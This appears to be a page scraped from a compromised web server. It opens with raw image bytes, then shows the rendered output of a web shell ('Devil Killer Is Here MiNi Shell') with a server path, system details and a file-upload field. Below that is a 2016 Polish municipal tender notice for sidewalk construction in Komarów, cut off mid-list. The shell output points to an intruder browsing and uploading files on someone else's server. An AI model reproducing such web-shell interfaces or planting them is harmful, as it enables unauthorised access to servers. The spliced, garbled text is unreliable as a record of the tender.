JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160218/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160218/36134-N-2016.html

<p class="kh_header"><b>Goleniów: Budowa chodnika w Komarowie</b><br>
<b>Numer ogłoszenia: 36134 - 2016; data zamieszczenia: 18.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Goleniów , Plac Lotników 1, 72-100 Goleniów, woj. zachodniopomorskie, tel. 091 4698200, faks 091 4698298.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.goleniow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa chodnika w Komarowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy zakres przedmiotu zamówienia do wykonania obejmuje:
Roboty pomiarowe przy liniowych robotach ziemnych- trasa dróg w terenie równinnym- (1,32 km),
Wykonanie inwentaryzacji geodezyjnej powykonawczej- (1 kpl.),
Karczowanie krzewów- 0,01000 ha, 
Ścinanie drzew o średnicy do 31-35 cm - (4,00 szt.),
Karczowanie pni o średnicy do 31-35 cm- (4,00 szt.), 
Ścinanie drzew o średnicy do 41-45 cm- (1,00 szt.), 
Karczowanie pni o średnicy do 41-45 cm - (1,00 szt.),
Ścinanie drzew o średnicy do 46-50 cm- (2,00 szt.), 
Karczowanie pni o średnicy do 46-50 cm- ( 2,00 szt.), 
Ścinanie drzew o średnicy do 51-55 cm- ( 2,00 szt.), 
Karczowanie pni o średnicy do 51-55 cm- ( 2,00 szt.),
Ścinanie drzew o średnicy do 56-60 cm- ( 1,00 szt.), 
Karczowanie pni o średnicy do 56-60 cm- ( 1,00 szt.), 
Ścinanie drzew o średnicy do 61-65 cm- ( 2,00 szt.) , 
Karczowanie pni o średnicy do 61-65 cm- ( 2,00 szt.),  
Ścinanie drzew o średnicy do 66-70 cm - ( 1,00 szt.),
Karczowanie pni o średnicy do 66-70 cm- ( 1,00 szt.),  
Ścinanie drzew o średnicy do 81-85 cm - ( 2,00 szt.),
Karczowanie pni o średnicy do 81-85 cm- ( 2,00 szt.),
Ścinanie drzew o średnicy do 86-90 cm- ( 3,00 szt.),
Karczowanie pni o średnicy do 86-90 cm- ( 3,00 szt.),
Wywożenie dłużyc do 10 km-  ( 53,38 mp),
Wywożenie karpiny - ( 42,50 mp),
Wywożenie gałęzi- (51,00 mp), 
Wywożenie krzewów- 0,01000,
Usunięcie warstwy ziemi urodzajnej o grubości średniej 15 cm- część do wykorzystania  na budowie, wywóz nadmiaru w miejsce wybrane przez Wykonawcę- (2624,00 m2),
Rozbiórka nawierzchni chodników z płytek betonowych, kostki betonowej , z wywiezieniem materiałów z rozbiórki- (48 m2),
Rozbiórka nawierzchni betonowych z płyt, kostki, bitumicznych na zjazdach gospodarczych                  z wywiezieniem materiałów z rozbiórki- ( 428,00 m2),
Rozbiórka nawierzchni betonowej z płyt jezdni-  ( 126,00 m2),
Rozbiórka krawężników betonowych wraz z ławą, z wywiezieniem materiałów z rozbiórki-                     ( 52,00 m),
Rozbiórka obrzeży betonowych z wywiezieniem materiałów z rozbiórki- (72,00 m), 
Wykonanie wykopów mechanicznie w gruncie kat. I-II (piasek), na odkład- (340 m3), 
Wykonanie nasypów z formowaniem i zagęszczeniem. Grunt z odkładu- (140,00 m3), 
Wykonanie nasypów z formowaniem i zagęszczeniem. Dowóz gruntu na plac budowy-                  (242,00 m3), 
Regulacja pionowa studzienek dla zaworów wodociągowych wraz z wymianą włazów-                     (13,00 szt.), 
Regulacja pionowa studzienek teletechnicznych wraz z wymianą włazów- (2,00 szt.), 
Regulacja pionowa studzienek kanalizacyjnych wraz z wymianą włazów- (9,00 szt.), 
Profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni- (2 521,00 m2), 
Wykonanie podsypki z pospółki stabilizowanej mechanicznie- ( 1 896,00 m2), 
Podbudowa z kruszywa łamanego o gr. 15 cm po mechanicznym zagęszczeniu- ( 595,00 m2), 
Podbudowa z kruszywa łamanego o gr. 20 cm po mechanicznym zagęszczeniu- ( 60,00 m2), 
Remonty cząstkowe nawierzchni bitumicznych- ( 6,00 t ),
Nawierzchnie ciągu komunikacyjnego z kostki betonowej (żółtej) gr. 8 cm na podsypce cementowo - piaskowej, spoiny m.2 wypełnione piaskiem- (1 896,00 m2), 
Nawierzchnie zjazdów z kostki betonowej (kolor antracyt) gr. 8 cm na podsypce cementowo - piaskowej, spoiny wypełnione piaskiem- (595,00 m2),
Nawierzchnia jezdni z kostki betonowej ( kolor czerwony) gr. 8 cm na podsypce cementowo- piaskowej, spoiny wypełnione piaskiem - (60,00 m2),
Oznakowanie poziome jezdni o nawierzchni bitumicznej materiałami cienkowarstwowymi-                (26,15 m2), 
Ustawienie konstrukcji wporczej złożonych ze słupków z rur stalowych ocynkowanych fi 60 mm dla znaków drogowych, wykonaniem i zasypaniem dołów z ubiciem warstwami- ( 4,00 szt.), 
Przymocowanie do gotowych słupów znaków informacyjnych typ D (długość boku 900), folia odblaskowa II generacji- ( 4,00 szt.) 
Organizacja ruchu na czas robót ( 1kpl.),
Ustawienie krawężników betonowych o wymiarach 15x22 wtopionych z wykonaniem ławy z oporem z betonu C-12/15- (473,00 m) ,
Ustawienie obrzeży betonowych o wymiarach 8x30 cm, spoiny wypełnione zaprawą cementową- (2984,00 m),
Ustawienie oporników betonowych na podsypce cementowo-piaskowej  ( 161,00 m),
Wykonanie ścieku podchodnikowego z elementów prefabrykowanych (płyt ściekowych o wymiarach 50x60x15cm) z uszczelnieniem wlotu betonem C-12/15 i spoin zaprawą cementowo-piaskową- ( 24,00 m) ,
Wykonanie zieleni niskiej, humusowanie z obsianiem trawą (mieszanka traw) pomiędzy chodnikiem a jezdnią, a także na poboczu przy chodniku. Grubość warstwy humusu 10 cm- (2624,00 m2)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających, w przypadku udzielenia,   w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy robót, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia zgodnych z przedmiotem zamówienia podstawowego. Poszczególne pozycje z przedmiaru robót opisują rodzaj robót jakie Zamawiający przewiduje do realizacji w ramach zamówień uzupełniających. Podstawą do negocjacji ceny za zamówienie uzupełniające będzie złożony  kosztorys ofertowy Wykonawcy w tym postępowaniu</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.53-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem spełnienia warunku zawartego w art. 22 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych Wykonawca musi wykazać, iż dysponuje w zakresie wiedzy i doświadczenia w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
a)	dwie roboty budowlane obejmujące swoim zakresem remont lub przebudowę lub budowę   chodników lub dróg  o nawierzchni z kostki betonowej  o wartości nie mniejszej niż 100.000,00 zł łącznie z podatkiem VAT każda. 
Wykonawca nie może sumować wartości kilku robót wymienionej powyżej o mniejszym zakresie dla uzyskania wymaganej wartości porównywalnej. Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem spełnienia warunku zawartego w art. 22 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych Wykonawca musi wykazać, iż dysponuje: w zakresie dysponowania odpowiednim potencjałem technicznym dysponuje: 
a)	co najmniej jedną spycharką lub ładowarką lub koparko- ładowarką,
b)	co najmniej  jednym samochodem samowyładowczym o ładowności min. 10 ton
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem spełnienia warunku zawartego w art. 22 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych Wykonawca musi wykazać, iż dysponuje co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności, które uprawniają do pełnienia funkcji kierownika robót drogowych w zakresie odpowiadającym przedmiotowi zamówienia,
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Zamawiający określa roboty budowlane, których dotyczy obowiązek wskazania przez Wykonawcę w wykazie oraz załączenia do nich poświadczeń, zawierających informację                        o robotach budowlanych wykonanych należycie oraz zgodnie z zasadami sztuki budowlanej               i prawidłowo ukończonych. Wykonawca ma się wykazać wykonaniem  w okresie ostatnich 5 - ciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie:
dwie roboty budowlane obejmujące swoim zakresem remont lub przebudowę lub budowę   chodników lub dróg  o nawierzchni z kostki betonowej  o wartości nie mniejszej niż 100.000,00 zł łącznie z podatkiem VAT każda. Wykonawca nie może sumować wartości kilku robót wymienionej powyżej o mniejszym zakresie dla uzyskania wymaganej wartości porównywalnej;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	formularz ofertowy przygotowany dla zamówienia - przygotowany zgodnie                                 z załącznikiem nr 1  do SIWZ, 
2.	oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - przygotowane zgodnie z załącznikiem nr 2 do SIWZ,
3.	jeżeli Wykonawca ma zamiar zlecić wykonanie części robót podwykonawcy to musi wypełnić          i załączyć do oferty załącznik nr 8 do SIWZ (jeżeli dotyczy),
4.	pełnomocnictwo do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik,
5.	kosztorys ofertowy ( brak kosztorysu ofertowego spowodowuje odrzucenie oferty)
6.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
Zamawiający, w celu oceny, czy wykonawca będzie dysponowała zasobami innych podmiotów w stopniu niezbędnym do należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do tych zasobów, żąda złożenia w ofercie stosownych dowodów w zakresie niezbędnym do udowodnienia, iż wykonawca dysponuje zasobami niezbędnymi dla należytego wykonania danego zamówienia, w zależności od okoliczności przypadku, z którego korzysta wykonawca. Dowodami tymi mogą być  dokumenty dotyczące w szczególności: 

a) zakresu dostępnych wykonawcy zasobów innego podmiotu, 
b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, 
c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, 
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia


Wykonawca celem udowodnienia faktycznego, czynnego korzystania z zasobów innych podmiotów w szczególności może przedstawić w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia zawierające odpowiednio do okoliczności przypadku, z którego korzysta wykonawca informacje określone w powyższych podpunktach od a) do d)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - okres gwarancji na roboty budowlane - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych w tym paragrafie. 

1.1. Zamawiający ma prawo, jeżeli jest to niezbędne, dokonać takich zmian jakości, ilości lub technologii robót lub ich części określonych w zamówieniu, jeżeli uzna, że są one niezbędne do uzyskania celu oznaczonego w Umowie, a Wykonawca powinien wykonać każde z poniższych poleceń:
			1) zmniejszyć ilość robót,
			2) pominąć poszczególne roboty,
			3) wykonać roboty zamienne,
			4) zamienić określoną harmonogramem kolejność robót,
5) zwiększyć ilość robót objętych kosztorysem ofertowym w ramach wykonania zamówień uzupełniających, niezbędnych dla zakończenia zamówienia podstawowego, po ich zaakceptowaniu przez Zamawiającego i zawarciu odrębnej Umowy zgodnie z art. 67 ust. 1 pkt. 6 Pzp. 

2. Zamawiający dopuszcza zmianę ceny umownej określonej w §8 ust. 1 niniejszej umowy                      w następujących przypadkach:
			1) ustawowej zmiany podatku VAT,
2) wykonania mniejszego zakresu robót niż zakres określony w projekcie budowlanym                                a w konsekwencji w kosztorysie wynikający z ich zaniechania w rozumieniu zapisu §1 pkt. 2.1                      i wystąpieniu okoliczności o których mowa w zapisach punktu 8 niniejszego paragrafu,
3) wykonania robót zamiennych w rozumieniu zapisu §1 pkt. 2.2 i wystąpieniu okoliczności                         o których mowa w zapisach punktu 9 niniejszego paragrafu,
4) konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej.    
3. Zamawiający dopuszcza przedłużenie terminu zakończenia robót o ilość dni potwierdzonych pisemnie przez Inspektora Nadzoru w dzienniku budowy, co może nastąpić w przypadkach określonych w ust. 6 niniejszego paragrafu, jak również w przypadku:
a)	niemożności realizacji robót z powodu braku dostępności do miejsc prowadzonych robót lub gdy obowiązujące przepisy nie dopuszczają do realizacji lub nakazują wstrzymanie robót,
b)	wstrzymanie robót przez Zamawiającego,
c)	konieczność realizacji zamówień dodatkowych,
d)	potrzeba realizacji zamówień uzupełniających, 
e)	konieczność realizacji zamówień zamiennych.
f)	 wystąpienia innych okoliczności poza wynikającymi z uchybienia Wykonawcy lub za, które Wykonawca nie jest odpowiedzialny,
g)	 gdy umowa nie może być realizowana z powodu siły wyższej lub z powodu następstw siły wyższej,
h)	 zmiany w uzbrojeniu i naniesieniach terenu w stosunku do danych w zasobach geodezyjnych, mających wpływ na termin realizacji.
i)	 w przypadku ukrytych wad dokumentacji projektowej, które ujawniły się w trakcie realizacji zamówienia,
j)	 jeżeli warunki atmosferyczne uniemożliwiają realizację robót (m.in. spadek temperatury poniżej 0 stopni Celsjusza, opady śniegu), 
k)	konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej, będących następstwem okoliczności leżących po stronie Zamawiającego,
l)	 natrafienie podczas robót budowlanych na przedmiot, co do którego istnieje przypuszczenie iż jest on zabytkiem.


4. Zamawiający dopuszcza zmianę Podwykonawców - podmiotów trzecich, na zasobach których Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu pod warunkiem, że kolejny Podwykonawca wykaże spełnianie warunków w zakresie wymaganym przez Zamawiającego na etapie postępowania o zamówienie publiczne.

5.	Zamawiający dopuszcza zmianę osób odpowiedzialnych za kierowanie robotami budowlanymi, pod warunkiem, że zaproponowana przez Wykonawcę, na dane stanowisko, osoba wykaże spełnianie warunków w zakresie nie mniejszym niż Zamawiający określił na etapie postępowania o zamówienie publiczne.

6.	Zmiany technologiczne, w szczególności:

a)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technologicznych/technologicznych niż wskazane w dokumentacji projektowej, w szczególności sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonania projektu,
b)	 odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategoria gruntu, kurzawka, itp.) skutkujące niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych,
c)	 odmienne od przyjętych w dokumentacji projektowej warunki terenowe,
w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych,
d)	 konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa,
e)	 pojawienie się nowszej technologii wykonania robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy,
f)	pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy, lub umożliwiające uzyskanie lepszej jakości robót.

7. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2015 r., poz. 2164 z późn. zm.) :
a)	zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana        nr rachunku bankowego), 
b)	zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami,
c)	udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach publicznych, 
